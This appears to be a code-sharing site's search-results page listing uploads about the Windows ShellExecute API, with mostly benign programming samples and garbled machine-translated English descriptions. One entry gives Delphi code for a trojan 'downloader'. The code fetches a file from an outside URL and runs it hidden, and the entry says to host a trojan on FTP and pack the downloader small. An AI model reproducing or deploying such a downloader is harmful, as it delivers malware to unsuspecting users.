Location:
Search - shellexecute
Search list
Description: 深入浅出ShellExecute -Explain the profound things of Shell Execute.
Platform: |
Size: 1930 |
Author: 吴汉 |
Hits:
Description: 这是利用ShellExecute来执行程序,也涉及到文件的一些操作-This is the use of ShellExecute to implement procedures, but also to document the operation
Platform: |
Size: 38912 |
Author: |
Hits:
Description: 执行后可以下载指定程序并执行
你先把大体积木马放到一固定FTP空间上
打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:)
用工具压一下,只有10K
这样说完是不行的,说一下代码:
program wsdgsRoad
uses
URLMon,
ShellApi
var
u,l: pchar
{.$R *.res}
function DownloadFile(SourceFile, DestFile: string): Boolean
begin
GetMem(u,100)
GetMem(l,100)
u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址
l:= c:/downpage.txt //改为你要存放并打开文件的路径
try
Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0
except
Result := False
end
end
begin
if DownloadFile(u, l) then
begin
ShellExecute(0, PChar( open ), PChar(l),
PChar( ), nil, 0)
end
//freemem(u)
//freemem(l)
end.
先试一下。。。。 ok,
明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: |
Size: 1024 |
Author: 韩冰 |
Hits:
Description: 该程序制作了一个简单的E-MAIL发送器,在VC中可以用ShellExecute函数简单的调用默认的电子邮件程序。-The procedure produced a simple E-MAIL transmitter in the VC can be simple to use ShellExecute function call the default email program.
Platform: |
Size: 10240 |
Author: 徐亮 |
Hits:
Description: 本例是一个用ShellExecute函数调用相应文档的一个例子,非常简单,自己可以照例添加自己的句子进去。-This case is a ShellExecute function call with an example of the corresponding documents, is very simple, they can add your own sentence, as usual, go.
Platform: |
Size: 2312192 |
Author: zj |
Hits:
Description: 在for DOS的C语言中,有一个system()函数,其功能是执行命令行程序,在VB中也有shell()函数,在Windows程序设计中WinAPI也为我们提供了类似的函数,它们就是WinExec()和ShellExecute(),下面就来讨论一下这两个函数的用法。
-In the C language for DOS, there is a system () function, and its function is to implement command-line program, in VB also shell () function in Windows programming WinAPI also provides us with a similar function, they are WinExec () and ShellExecute (), following on to discuss the usage of these two functions.
Platform: |
Size: 5120 |
Author: lijing |
Hits:
Description: 用VB做QQ强制聊天器
用VB做QQ强制聊天器
大家好..我是愚罪..QQ:303931726
今天教大家来用VB做QQ强制聊天器.....
废话不多说了```
直接打开VB 新建一个EXE文件..新建一个Text和一个Command按纽
最后直接把代码写上去就可以了...
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hwnd As Long, _
ByVal lpOperation As String, _
ByVal lpFile As String, _
ByVal lpParameters As String, _
ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
Private Sub Command1_Click()
ShellExecute 0, "open", "tencent://message/?uin=" + Text1.Text, "", "", 1
End Sub
可以了...生成试验下..我就不美化了..你们可以去美化下```
看。。成功了-QQ forced to use VB to do so VB uses QQ chat chat mandatory browser everyone .. I was stupid crime .. QQ: 303931726 today teach everyone to use VB to do QQ chat browser mandatory nonsense ..... nothing to add to that `` ` VB directly open a new EXE file .. create a new Text and a Command button code to write directly to the final you can go ... Private Declare Function ShellExecute Lib shell32.dll Alias ShellExecuteA _ (ByVal hwnd As Long, _ ByVal lpOperation As String, _ ByVal lpFile As String, _ ByVal lpParameters As String, _ ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As LongPrivate Sub Command1_Click () ShellExecute 0, open , tencent:// message/? uin =+ Text1.Text, , , 1End Sub can test the next generation ... .. I do not glorify .. you can go to see ``` under landscaping. . Successful
Platform: |
Size: 1024 |
Author: 好感觉 |
Hits:
Description: ShellExecute的使用技巧演示!-The use of ShellExecute presentation skills!
Platform: |
Size: 1874944 |
Author: shingpha |
Hits:
Description: 在编程运用了众多的编程小功能:
1、ToolTip 鼠标移动到一个按钮上时,自动弹出一些提示,本程序采用了XInfoTip;
2、Mouse 在程序添加了动态鼠标功能;
3、Icon 软件不采用VC6.0的默认图标;
4、托盘显示与软件界面前端显示;
5、使用ShellExecute()函数调用其他程序。-Use in programming a wide range of programming a small function: 1, ToolTip to a mouse button, the automatic pop-up some tips, the procedures used XInfoTip 2, Mouse in the process added a dynamic mouse function 3, Icon software do not use the default icon VC6.0 4, pallet display and software interface front-end display 5, using the ShellExecute () function call other programs.
Platform: |
Size: 180224 |
Author: Liu |
Hits:
Description: 简单的API函数CreateToolhelp32Snapshot
ShellExecute
PostMessage 用法
VS2005 C-CreateToolhelp32Snapshot
ShellExecute
PostMessage
about some API method in VS2005 C++
Platform: |
Size: 1024 |
Author: 林齐 |
Hits:
Description: 分别用CreateProcess()和ShellExecute()实现打开新的应用程序,并在规定时间内关掉进程。-Were treated with CreateProcess () and ShellExecute () the realization of new applications to open and turn off the process of the time.
Platform: |
Size: 46080 |
Author: 逍遥客 |
Hits:
Description: Run exe by shellExecute
Platform: |
Size: 24576 |
Author: air |
Hits:
Description: Auto-Run to media files or already playlist file you had one by using ShellExecute API for OSMSWindowsX
Platform: |
Size: 2048 |
Author: hakanbul |
Hits:
Description: CreateProcess,WinExec,ShellExecute 三种打开进程的函数使用例子-CreateProcess, WinExec, ShellExecute function of the use of three examples of open process
Platform: |
Size: 66560 |
Author: daiafei |
Hits:
Description: ExecuteFile(FileName: string)
filename complete path plus parameters
win32 api function ShellExecute-ExecuteFile(FileName: string)
filename complete path plus parameters
win32 api function ShellExecute
Platform: |
Size: 7168 |
Author: batlerboy |
Hits:
Description: WinAPI ShellExecute调用文件-WinAPI ShellExecute call file
Platform: |
Size: 6144 |
Author: 李澈 |
Hits:
Description: C程序调用ShellExecute函数打开发邮件的OutLook程序,编译成功后会生成一个命令提示符可执行程序,打开后显示:确认打开邮件收发程序!(Y/N),如果选择Y,则调用Windows系统的OutLook程序,进行邮件发送,向读者演示如何在C语言中调用ShellExecute函数。-C program calls the ShellExecute function is to fight the development OutLook mail program, compiled after the success of a command prompt will generate an executable program, opened shows: Open the mail delivery confirmation procedure! (Y/N), if you select Y, then call the Windows system OutLook procedures, mail, shows the reader how to call the ShellExecute function in C language.
Platform: |
Size: 2048 |
Author: 张名 |
Hits:
Description: Sample code for ShellExecute
Platform: |
Size: 795648 |
Author: jonathan.araneda |
Hits:
Description: WindowAPI应用一例,用ShellExecute打开本机中指定的目录。-WindowAPI application one example, use ShellExecute to open the machine in the specified directory.
Platform: |
Size: 13312 |
Author: jf |
Hits:
Description: this to implement shellexecute function
-this is to implement shellexecute function
Platform: |
Size: 31744 |
Author: funpro |
Hits: